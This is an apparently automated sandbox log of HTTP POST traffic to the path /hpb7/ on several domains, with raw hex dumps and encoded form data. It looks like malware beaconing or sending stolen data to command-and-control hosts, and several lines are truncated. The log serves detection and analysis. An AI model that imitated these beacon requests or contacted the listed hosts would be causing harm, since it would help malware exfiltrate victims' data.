70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 76 6a 43 6f 30 4e 37 50 7a 5a 31 49 39 6a 4f 44 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 67 37 41 68 48 61 65 5f 64 34 48 38 45 2d 73 6d 41 4a 6c 57 76 33 49 61 6d 5a 37 74 30 4f 54 4d 49 32 75 4b 36 42 43 33 70 71 57 59 58 36 70 61 6c 77 7a 42 48 5a 68 42 54 59 6a 78 75 63 4e 32 6f 62 4b 6a 6e 5a 4e 70 54 74 42 71 31 38 78 4b 68 42 71 56 4a 7a 7e 73 58 79 33 44 69 6a 50 4f 55 35 4d 48 6a 6c 51 73 61 41 59 65 76 35 39 4d 28 44 4c 6b 52 2d 41 7a 50 47 65 45 4d 59 4d 6b 70 39 55 4f 66 4a 65 38 28 48 43 4c 35 32 30 59 77 64 6f 6e 6b 79 44 61 32 4f 50 32 31 74 59 58 34 7a 28 6f 4b 56 6d 74 64 35 59 59 65 58 43 6d 49 6d 4a 48 4c 30 68 6f 74 6d 52 78 75 6e 77 4b 32 6d 39 7a 4c 48 70 78 50 6b 35 47 5a 6b 69 4c 68 68 62 54 70 7a 58 54 39 55 62 59 43 39 4b 4c 70 62 64 75 76 56 57 4b 56 63 70 45 41 33 32 4e 58 63 4d 66 54 6c 45 57 38 62 64 69 34 61 70 5f 37 39 41 76 41 34 47 30 6f 53 62 6d 65 4a 42 32 4a 6a 70 65 44 4c 53 73 68 6f 73 79 6f 30 58 4f 56 41 38 6e 32 35 54 35 56 6f 32 37 74 69 61 4d 77 70 33 62 51 44 6d 4d 41 47 68 41 48 41 41 6f 71 6f 7e 4a 44 6e 37 52 6b 74 77 34 76 43 38 58 62 42 6f 4e 41 57 62 68 49 50 46 41 4b 6c 7e 65 53 38 44 41 47 32 71 58 73 4f 31 30 7e 43 4e 63 67 66 4f 74 58 6b 62 34 45 5a 72 4e 68 61 78 70 6d 47 77 50 59 38 58 4b 7e 6c 4e 7a 51 58 67 75 78 48 77 7a 65 6f 38 2d 43 4d 74 51 67 56 71 6b 4d 58 6d 49 43 57 63 72 61 43 6e 31 53 6f 71 65 6a 52 70 50 4d 58 47 4c 6f 30 54 32 51 63 43 6e 69 48 4d 66 59 4e 30 78 42 78 4b 35 73 30 31 2d 64 5a 4b 6e 58 78 43 4e 48 5a 51 77 6c 48 6c 6d 57 44 4d 57 31 77 37 4f 72 35 4a 53 37 62 45 7a 55 6c 69 77 53 6f 6a 38 63 62 4f 45 64 65 78 74 32 32 46 34 68 54 77 62 41 48 41 4d 6a 76 74 7a 57 63 68 54 4c 49 28 41 47 71 73 34 55 59 47 74 43 70 7e 75 33 4a 28 44 38 4d 38 6a 68 49 48 75 59 6c 7a 41 76 6b 65 4a 47 52 47 49 28 6a 69 43 76 47 46 6f 42 32 46 38 67 34 43 5a 65 4a 48 61 56 34 75 49 59 4f 36 55 5a 47 52 6c 45 47 47 79 7a 72 67 63 4c 4d 59 4e 54 6d 41 37 51 30 63 4c 47 7a 4e 65 6a 34 45 4a 47 36 4d 44 65 4d 6c 2d 58 73 43 76 4c 32 57 70 4b 34 4f 77 48 5f 57 5a 69 6a 62 76 4f 48 38 47 59 45 67 41 6e 62 4c 54 39 6f 4e 6b 79 4b 71 47 4a 6e 39 62 7a 46 4b 6a 38 37 6f 50 30 51 38 4b 79 6b 6d 4c 49 4e 6f 54 51 64 65 57 69 42 56 33 6a 44 38 5a 57 50 66 57 71 46 51 64 54 38 34 77 46 4a 74 55 53 6c 4d 37 34 77 44 6d 43 45 4d 72 79 43 52 61 56 69 66 50 7a 4a 45 59 44 36 51 34 48 67 42 4f 45 45 64 4a 6b 75 56 36 41 43 4f 69 6c 63 39 36 50 4a 56 43 37 7a 6c 42 5a 6d 28 62 45 59 6d 69 38 79 32 6d 67 67 38 2d 53 32 4b 4e 30 65 32 35 71 41 28 6b 44 4d 32 55 67 32 6d 4e 53 49 56 4f 41 6e 57 5f 66 71 67 57 4a 54 6e 4d 32 6a 38 63 77 31 55 72 78 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 77 49 4e 32 4a 77 69 55 5a 5f 4d 46 54 65 4b 31 47 5a 62 52 28 6a 52 4d 28 2d 35 4c 66 4f 28 36 6b 6e 6b 54 41 74 76 50 6f 72 56 5f 36 37 69 63 32 4d 34 42 4c 4c 5a 51 68 57 57 74 4a 56 4a 6e 33 42 7a 53 75 52 48 54 65 65 71 70 4e 48 77 48 55 79 6d 33 68 44 46 4c 5a 64 77 53 61 62 64 4e 74 6f 58 51 51 64 6c 35 45 38 6b 47 4d 48 76 78 36 30 71 38 53 66 76 47 77 47 59 77 56 46 28 75 56 70 62 78 52 51 47 58 73 41 56 51 7e 34 76 4f 37 4a 42 6d 39 67 48 68 6a 4d 56 53 7a 61 6e 71 4c 72 6d 70 64 6e 5a 4f 78 4c 55 61 56 2d 6b 51 75 48 64 44 70 67 7e 43 6f 73 66 42 59 36 67 72 63 35 4d 5a 6d 63 4d 4c 77 77 43 6e 74 4a 75 51 7e 31 51 4e 6c 6d 61 46 78 38 6c 6e 54 72 54 72 4d 63 35 56 55 48 37 44 4e 6a 42 6b 59 31 58 5f 36 7a 62 46 6d 47 73 57 56 6a 75 62 74 7a 57 6d 6b 46 32 76 31 35 63 41 6c 76 78 70 55 57 78 75 4c 55 7a 61 4e 7a 79 45 4c 33 6b 49 74 6a 42 2d 5a 6c 43 52 47 2d 6b 77 39 6e 79 67 42 6b 71 4e 6e 63 4e 30 31 46 66 78 7e 59 70 74 4e 34 43 6e 32 58 74 66 6e 5f 28 34 36 37 67 32 50 63 6d 49 56 6b 6e 52 56 7a 4c 41 73 76 54 52 75 59 6e 72 66 76 55 57 53 45 35 30 77 63 5a 4e 39 6c 38 63 6d 5f 62 46 53 53 54 5a 71 66 70 51 36 70 6d 35 37 57 58 32 71 43 44 46 64 4c 6f 4c 4a 68 77 4b 71 66 6e 77 73 30 71 47 73 45 63 78 30 72 53 78 34 75 6f 75 74 31 58 46 28 31 52 4e 53 41 34 36 79 4c 31 58 33 64 6b 4d 7e 56 32 31 52 50 73 52 46 65 61 66 68 34 7e 6f 50 6b 4e 44 7a 5f 45 74 32 68 36 65 4e 52 39 73 6e 45 36 4a 28 35 6b 4f 59 58 6a 48 79 44 77 73 51 6b 35 32 53 2d 65 46 50 4d 30 49 61 39 67 72 46 6c 63 67 71 6e 4a 6a 51 4c 6e 4e 70 7a 64 71 50 46 56 6a 62 6a 65 36 76 7a 48 38 37 5a 39 6b 28 63 49 52 44 51 64 49 5a 34 50 4e 44 4f 65 6b 74 69 56 6f 31 36 78 66 39 65 65 35 72 76 6f 62 52 68 66 4b 69 39 59 35 39 52 76 72 30 39 41 57 4f 42 51 38 70 65 66 7a 4e 42 55 45 56 78 44 62 33 4e 52 30 52 32 58 73 7e 4b 42 4f 57 63 50 66 6f 7a 77 48 58 51 6f 72 45 32 33 79 75 78 28 38 43 4d 48 5a 65 4b 39 74 74 68 51 75 79 74 33 56 61 36 67 61 66 59 33 6f 65 61 4b 78 33 77 39 55 5a 4e 79 4e 36 35 6e 61 71 43 43 68 62 64 70 6a 37 32 54 48 64 31 75 54 78 53 6c 4b 69 56 4e 32 58 66 66 76 78 52 76 33 6a 45 77 31 6f 4c 63 5a 34 75 37 6a 46 76 32 71 4d 73 43 4b 6f 6a 33 70 48 73 73 77 74 44 6d 64 52 62 4a 6f 4f 5f 74 62 6f 75 71 43 69 5a 33 58 37 37 31 74 35 67 4b 48 63 61 28 64 48 68 4a 51 6e 7a 74 78 44 57 56 34 41 6b 4f 6c 75 4a 6f 32 7a 56 4a 67 73 54 38 36 6e 6d 33 74 65 78 7a 6b 7a 6f 52 4d 6f 6c 39 53 79 79 4c 36 6c 77 46 61 59 34 52 4f 4b 30 48 45 43 64 4c 73 62 46 70 65 37 4a 77 66 7a 53 4d 69 55 36 4e 41 4a 50 7e 4
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 62 67 59 38 55 71 66 5a 46 33 5a 32 67 56 30 71 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 44 5f 57 6c 6a 61 46 42 63 30 74 61 4c 73 79 6d 45 65 30 62 77 51 65 57 31 65 6a 4d 56 53 48 65 66 39 4f 78 6e 66 58 66 35 4e 59 68 76 6d 37 41 47 70 6a 74 65 53 76 78 41 79 66 63 51 57 4c 53 5a 4b 43 4b 34 46 73 68 36 79 57 57 4d 45 59 6f 43 51 64 70 62 63 4c 54 79 43 72 39 61 43 6b 30 64 33 6e 51 4a 6e 7e 58 35 6f 49 63 42 4c 67 30 76 66 62 67 67 59 5a 31 33 2d 68 2d 43 45 45 50 43 67 74 6f 44 6e 39 34 43 5f 38 76 37 4c 32 4f 49 42 57 64 5a 69 49 67 47 71 33 6c 45 7a 78 34 6b 46 59 6d 4e 75 54 47 4e 76 74 4d 43 45 44 52 35 44 47 49 52 4c 4f 52 41 33 4f 75 57 78 6b 5f 57 6d 39 58 6b 59 62 50 49 42 4d 41 45 6f 4a 30 75 54 69 49 6e 6b 37 58 36 4e 48 59 42 4c 4a 56 51 6e 32 35 6c 78 55 79 28 72 51 42 6b 44 6b 69 51 49 52 67 75 58 71 59 76 74 4c 36 6a 69 74 75 31 30 55 58 78 6d 35 46 51 47 77 47 62 61 42 59 34 58 6d 73 67 42 47 63 50 44 69 4a 35 55 52 4a 64 34 73 49 6d 78 65 4a 43 53 68 2d 7e 58 76 59 39 78 56 45 41 74 6a 54 55 73 36 31 28 5f 4b 6e 78 37 76 30 64 4b 78 75 35 57 43 42 61 6d 6b 5a 50 62 41 2d 75 65 68 71 71 54 57 59 51 77 61 67 4c 6c 73 49 63 43 64 31 52 74 77 64 72 69 47 46 4c 37 43 77 34 31 64 45 4e 31 6e 44 59 53 74 6a 44 71 37 50 6e 74 4c 78 73 4c 5a 30 39 76 4c 6f 69 69 4d 71 56 56 44 35 58 75 38 4a 43 6f 43 53 32 47 74 57 38 35 59 59 35 30 43 78 56 6d 75 6f 37 71 68 78 74 47 47 4c 4c 39 53 6d 65 65 6c 32 4d 4b 6d 34 6c 74 49 48 65 4b 55 4a 62 53 68 59 4c 66 37 41 44 45 54 4c 70 45 35 5f 77 35 51 35 28 4a 47 44 50 46 4f 45 56 49 4e 54 79 54 4f 30 52 2d 38 4a 77 69 6f 6a 42 30 71 43 55 38 36 46 4a 5f 72 62 4f 7a 6d 65 79 66 47 79 6d 69 6c 52 61 6d 6b 6a 4a 34 52 47 74 69 74 4c 63 47 6b 4f 36 38 39 43 78 48 62 54 64 42 4b 4e 65 62 4b 47 75 30 72 6b 6c 57 78 69 77 6a 4f 36 31 5f 35 38 64 42 52 2d 4f 5a 41 39 33 4e 78 4e 58 39 46 6d 6a 57 77 39 4f 51 4a 78 58 65 63 73 71 6f 59 76 4c 6f 79 49 43 4f 28 6d 30 4e 47 63 4b 38 69 44 28 39 42 76 7e 57 62 43 6f 52 6e 53 34 47 44 44 78 56 6d 6b 4c 51 59 68 4f 5f 50 32 42 68 31 4b 7a 43 72 76 4b 65 52 32 4b 33 38 38 75 32 66 6f 4b 7a 38 74 6c 78 36 4d 38 76 44 6e 66 72 48 67 4b 69 65 31 48 4e 4d 7a 70 61 66 6b 49 72 4d 58 54 4f 35 52 33 48 62 6f 32 73 59 45 45 39 32 6c 74 54 7e 37 53 4a 6b 35 45 71 58 56 61 78 7e 47 7e 66 41 64 74 37 6d 33 39 42 6a 30 6f 78 54 69 47 61 72 6b 68 57 42 7a 66 6b 7e 4d 6b 4b 4b 4c 6b 45 35 62 42 7a 75 36 39 6c 34 47 58 47 73 69 67 77 68 56 32 64 42 4c 56 39 55 5a 79 37 56 5f 41 6c 48 6e 62 67 56 58 66 5f 35 38 53 6d 45 64 36 58 42 30 7a 65 6f 63 79 78 54 67 50 69 73 72 56 4b 64 51 28 64 35 45 5
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 72 47 6d 62 63 64 70 36 66 71 62 58 39 54 49 4c 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 77 66 55 49 54 4a 72 38 6e 42 69 33 43 30 6e 79 34 56 51 4b 34 4c 42 78 4e 30 64 31 37 31 6e 5a 62 68 73 33 6f 37 6d 43 49 62 66 65 4d 59 39 2d 75 44 4f 5f 5a 47 52 6f 66 4d 30 48 44 2d 4b 44 7e 63 7e 59 4b 7a 7e 57 33 55 31 6d 67 79 68 45 7a 57 75 42 72 6d 4b 6f 34 63 47 5f 30 46 78 56 61 6f 28 77 4f 52 4e 56 51 56 62 66 74 6f 63 64 61 69 34 68 54 4b 6c 54 63 54 47 34 42 37 54 4b 43 79 52 45 73 4a 55 64 72 71 64 53 7a 4d 7a 44 4e 43 38 58 68 33 75 6a 62 50 35 42 64 75 36 36 30 33 42 67 34 6a 28 41 6f 64 58 78 44 49 5a 6e 47 62 6d 4c 6b 37 32 44 7a 49 49 6d 4d 36 41 65 74 70 6e 75 79 4c 54 79 46 50 73 39 63 36 4f 47 4c 56 34 61 31 39 43 31 5a 43 72 69 6e 31 78 61 62 42 67 6a 79 45 79 47 75 44 74 75 4f 53 36 66 4e 47 51 39 65 76 4d 49 49 49 35 67 64 54 61 43 38 62 35 31 70 77 67 2d 4d 74 48 71 62 62 6b 36 6c 6c 75 63 31 32 4f 4d 34 49 31 4b 76 48 57 2d 77 4c 63 31 57 57 38 46 78 38 6e 54 51 31 68 6e 28 46 47 41 39 67 79 45 46 69 67 4e 42 5f 39 31 62 62 35 47 64 7a 66 36 70 42 46 68 59 37 6c 50 6d 33 61 64 54 50 48 69 31 64 6a 33 57 6e 48 71 36 44 76 68 66 30 58 34 76 57 64 30 76 6a 30 71 69 44 73 51 54 37 62 2d 6a 57 34 5a 7e 45 43 2d 30 56 73 45 55 6c 36 43 4a 6e 33 6c 68 70 54 6f 78 59 4b 6d 55 52 39 45 58 4e 34 4f 63 51 51 56 7a 55 7e 41 61 66 43 57 4d 68 66 62 7a 4c 6c 7a 32 47 51 43 6b 63 4f 34 4e 77 5a 42 4e 52 31 5f 75 45 4a 35 79 62 36 56 41 39 47 57 4a 54 52 4a 73 59 61 38 74 36 37 35 67 51 45 61 79 59 69 35 73 6b 31 79 5a 41 31 7a 67 54 74 71 58 74 6c 68 59 53 79 7a 57 54 36 76 53 47 64 46 56 4d 66 4b 55 4d 6a 47 65 75 47 44 6a 76 6f 37 54 35 78 6a 57 6b 62 59 44 75 52 75 50 31 39 43 67 62 4c 48 45 52 31 44 75 69 28 7a 28 44 48 6f 77 4b 6e 35 28 46 30 59 64 6b 34 56 31 68 5a 52 6b 69 56 52 4b 45 4b 30 49 75 71 5a 48 53 62 68 4e 38 4b 41 45 59 6e 55 62 44 6a 41 4f 38 4d 67 32 58 5a 35 6a 77 61 57 52 38 4f 64 58 65 57 4e 48 55 36 71 7e 4f 76 6c 50 55 51 42 43 77 78 34 4c 4a 6a 4c 4b 31 48 43 6f 35 42 52 42 78 76 77 50 47 77 70 4a 65 43 49 71 45 33 74 71 4a 4b 62 44 44 43 6e 57 49 66 45 42 38 58 35 48 70 65 63 67 72 4c 75 4c 30 54 4f 37 4a 44 43 32 6d 31 69 51 4d 6a 7a 4a 73 45 77 71 4c 46 70 68 74 5a 41 59 2d 53 6d 52 2d 7a 54 58 32 6c 70 45 5a 68 58 45 43 69 4a 4b 45 44 57 62 4d 5a 33 41 50 4c 41 7e 61 33 74 37 70 5a 44 6e 69 51 4a 66 46 57 33 6a 57 59 33 45 77 31 34 75 70 45 51 66 32 4d 5a 71 71 73 2d 47 36 57 43 6e 32 65 6a 36 37 37 2d 55 70 50 63 49 74 63 79 62 32 38 47 5a 63 70 44 4d 6b 69 35 56 53 36 34 70 5f 32 47 44 69 4a 39 79 66 70 74 63 6c 7e 6e 7a 44 55 6a 73 6b 44 4
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 62 4d 68 54 47 69 4b 4e 51 5a 47 2d 5a 50 31 53 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFbMhTGiKNQZG-ZP1S9g).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 77 6d 61 38 57 44 39 4c 6e 50 6d 74 39 6a 30 48 67 6f 69 67 48 30 6e 70 72 62 59 44 6b 55 70 6e 50 38 78 67 79 5a 6d 6e 7e 42 58 59 6a 70 45 77 4b 4a 28 55 51 6d 28 5a 5a 4a 70 53 75 74 58 33 52 77 73 57 35 61 4c 45 48 64 71 35 78 6e 59 46 53 4a 69 6c 54 39 72 36 4e 79 47 41 4e 66 33 32 79 54 75 72 36 32 34 30 68 43 34 61 50 37 76 6b 71 39 71 77 6a 67 54 42 70 45 50 6e 44 34 45 2d 52 73 4b 77 74 67 73 79 70 4b 63 39 6c 42 41 51 38 41 4b 62 50 63 6f 6b 54 69 4b 7a 65 65 37 76 50 72 67 49 6f 36 75 44 56 74 4a 58 76 71 73 47 48 6a 45 5a 72 57 76 58 38 74 74 79 31 7a 34 4a 31 6d 4d 31 57 59 42 50 5a 38 69 6f 45 62 35 45 58 4f 4f 6c 6e 38 7e 4b 6a 6c 4c 4f 78 37 39 30 53 69 35 30 70 78 4e 37 43 6a 33 43 49 6c 39 31 34 69 56 6b 4d 45 4d 69 62 4e 28 54 30 35 52 63 30 55 49 58 46 57 34 46 56 33 41 48 61 45 66 56 47 4a 66 53 37 32 73 6f 42 6f 68 50 72 53 56 33 48 73 56 34 7a 58 49 36 79 54 56 46 49 5f 49 4e 4b 6e 48 4c 31 33 75 4f 61 37 30 49 41 38 74 4e 4c 6f 77 36 4c 71 6b 49 31 35 6f 5f 73 32 55 4f 28 5a 41 74 46 34 52 45 54 44 42 76 28 31 52 30 75 6f 7e 4c 7e 4a 47 6f 7e 73 48 7a 76 42 44 71 75 6d 78 61 54 76 54 6d 30 4d 6c 33 57 54 4e 4f 71 79 42 5f 47 32 73 68 6a 66 4b 48 78 73 76 71 30 6b 51 75 45 6c 7a 78 43 37 43 6d 4e 55 46 73 6f 72 54 2d 58 51 4c 64 67 32 73 37 49 33 6a 50 62 79 54 5f 50 66 58 65 71 44 72 49 67 4e 37 37 78 33 28 61 6e 70 38 69 30 67 49 71 68 49 6f 39 49 49 39 4a 4a 68 63 35 28 56 28 62 33 6f 65 65 76 41 4e 65 66 70 32 62 67 62 6a 6f 34 31 67 6a 44 53 6f 71 30 59 50 4b 31 6f 75 46 6e 57 4c 49 42 52 48 61 69 31 46 61 4b 66 4a 46 6f 63 6c 6e 67 6b 45 43 34 59 66 32 65 33 69 75 75 5f 47 2d 4f 55 57 62 55 55 71 56 30 61 63 34 6e 31 41 4d 43 64 35 6c 53 70 6f 33 41 49 76 65 76 33 39 73 4c 45 4f 71 28 5f 32 71 69 42 53 69 56 30 63 6a 36 34 4a 6f 79 43 64 57 67 71 76 5a 49 6e 76 52 73 36 4f 2d 76 77 47 57 7a 5a 72 6b 66 61 39 48 5a 64 35 79 75 6c 4f 6f 48 4e 43 50 79 72 77 56 78 43 4d 72 79 46 6a 41 63 4b 51 50 7e 47 54 36 48 56 62 76 65 7a 4a 30 6d 66 57 42 4a 4b 43 4d 56 4d 59 52 6a 62 37 77 34 72 51 68 68 5f 52 56 28 6a 34 34 58 41 76 72 6e 43 50 6d 59 53 59 61 66 31 30 52 77 70 52 6a 33 68 28 46 47 57 45 53 75 63 33 65 6c 51 54 38 79 61 35 6c 7a 77 48 48 6c 69 6e 42 66 54 6d 56 46 74 79 61 43 58 7e 35 37 4e 55 53 7e 47 4d 4c 34 77 43 74 4f 4d 42 6c 77 48 51 7a 71 38 7e 77 46 